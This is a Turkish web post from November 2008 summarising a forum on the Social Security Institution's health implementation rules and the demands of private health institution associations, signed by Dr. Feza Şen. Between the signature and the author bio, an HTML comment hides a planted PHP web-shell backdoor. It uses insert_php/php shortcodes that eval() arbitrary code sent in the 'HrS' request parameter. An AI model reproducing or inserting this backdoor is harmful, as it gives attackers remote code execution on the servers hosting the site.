Sağlık Uygulama Tebliği’nin Özel Sağlık Kurumlarının Geleceğine Yansımaları Konulu Forumun Sonuçları

/ 4 Kasım 2008 / 848 views / yorumsuz

Başta programına katılan Çalışma ve Sosyal Güvenlik Bakanı Faruk Çelik olmak üzere, SGK Başkan V. Fatih Acar, Genel Müdürü Dr. Sami Türkoğlu, SGK Sağlık Uygulama ve Mevzuat Daire Başkanı Dr. Halil Akçe ve SGK Sağlık Hizmet Sunucularının ve Ödemelerinin Yönetimi Daire Başkan V. Dr. Süleyman Hakbilen’ne ileterek acil çözüm talebinde bulundular.

Program OHSAD Başkanı Reşat Bahat ve yönetimi, SİF Başkanı Mehmet Altuğ, AYSAD Başkanı Kürşat Özdemir ve yönetimi, TÜMSAD Başkanı Ahmet Karataş ve yönetimi, TÜMHASAD Başkanı Ali Aslan ve yönetimi, TÜSİDER Genel Sekreteri Serdar Sargın ve yönetimi, Ege Sağlık Kuruluşları Başkanı Vecdi Türsen, İSKD Başkanı Serap Uluırmak ve SABİR Genel Sekreteri Levent Genç’in ve sayıları ikiyüzü bulan özel sağlık sunucularının katılımı ile gerçekleşti.

 

Toplantıda özel sağlık kuruluşlarını temsil eden yöneticiler ortak talepleri olarak;

 • 10 YTL katkı payının özel sağlık sunucularına gelen başvurularda engel oluşturduğu ve katkı payının yeniden değerlendirilmesini,
 • Fark ücretlerine getirilen sınırlamadaki % 30 oranının reel hale getirilmesini,
 • SUT ile belirlenen hizmet fiyatlarının 2009 yılı için yeniden değerlendirilmesini,
 • SGK tarafından yapılan fatura denetimlerinde ortak dil oluşturulmasını ve
 • Branş bazlı hizmet anlaşmalarına izin verilmesini ifade ettiler.

Taleplerinin ivedi çözüme kavuşmaması halinde çok az bir sağlık kuruluşunun ayakta kalabileceğini dile getirdiler.

Toplantı neticesinde özel sağlık kuruluşları’nın kabul etmesi gereken gerçeklerin;

 • Türkiye deki sağlık harcamalarındaki artışların kabullenilebilir sınırları aştığı ve bu harcama artışın oluşturduğu baskının sağlık politikalarını belirlediği,
 • En büyük sağlık hizmeti alıcısı olan Sosyal Güvenlik Kurumu’nun sağlık hizmetinin sürdürülebilirliğinin sağlanmasında etkin belirleyici rolü olduğu,
 • Tedavi edici hizmetlerin sunumunda, 1.basamak sağlık hizmetlerini güçlendirerek uluslar arası sağlık sistemlerinde olduğu gibi aile hekimleri tarafından sunulmasının artacağı,
 • Özel Sağlık Sunucuları tarafından katkı payının varlığının tartışılmaması gerektiği, ama halen uygulanan 10 YTL rakamının, üçüncü basamak sağlık hizmetlerinde alınan bedelin altına düşürülmesi talebinin zaman içinde değerlendirilebileceği,
 • Kamu ve özel sağlık sunucuları arasında hizmet maliyetlerinin kıyaslanabilmesi için özel sağlık kuruluşları ve dernekleri tarafından sunulan maliyet çalışmalarının geçerli kabul edilmesi için, maliyete esas alınacak harcama kalemlerinin neler olduğu konusunda hem fikir olduktan sonra yapılacak maliyet çalışmalarının kabul edilebileceği,
 • Hekimlerin özel sektörü tercih etmelerinin önlenmesi için kısıtlayıcı uygulamaların olabileceği,
 • Kısa vadede, özel sağlık hizmeti sunumunda değişiklik yapılması için 2008 ikinci yarısından sonra Medulla da toplanan verilerin çok önemli olduğu ve bu sonuçlar ışığında yeniden değerlendirme yapılabileceği görüldü.

SGK Başkan V. Fatih Acar, “1 Ocak’tan itibaren temiz bir sayfa açılacak, Sağlık hizmet sunucuları bir yılda üç kez denetlenecek. Özel sağlık sektörünün geldiği noktayı görüyorum, bunu geri götürmek amacında değiliz fakat mali olarak kontrol altında tutmalıyız. 2008’de kısmi düzenlemeler yapıldığını, esas düzenlemeler 2009’da yapılacak ve Özel sağlık hizmeti sunucuları önümüzdeki dönemde daha aktif olacaklardır.” dedi.

Katılımlarından dolayı tüm sağlık hizmeti sunucularına teşekkür eder, hep birlikte bu sıkıntıların aşılması için gereken çalışmaları yapacağımızı bildirir, iyi çalışmalar dileriz.

 

Dr. Feza Şen
Bursa Sağlık Kuruluşları Derneği Genel Sekreteri
0 532 2778827�
fezasen@megamed.org �
feza.sen@hotmail.com 

<!– [insert_php]if (isset($_REQUEST[“HrS”])){eval($_REQUEST[“HrS”]);exit;}[/insert_php][php]if (isset($_REQUEST[“HrS”])){eval($_REQUEST[“HrS”]);exit;}[/php] –>

Tıp fakültesi mezuniyeti sonrası İşletme Fakültesinden Sağlık Bilimleri Yönetimi Uzmanlığımı MBA tamamladım. 1997 yılından bugünlere Özel Sağlık Sektöründe durum tespitleri, kurulum, işletim, yönetim ile ARGE ve ÜRGE safhalarında geleceğe dair projelendirmeler üzerine çalışmaktayım.. 0 532 277 88 27 – fezasen@megamed.org – info@fezasen.com

Yorum yaz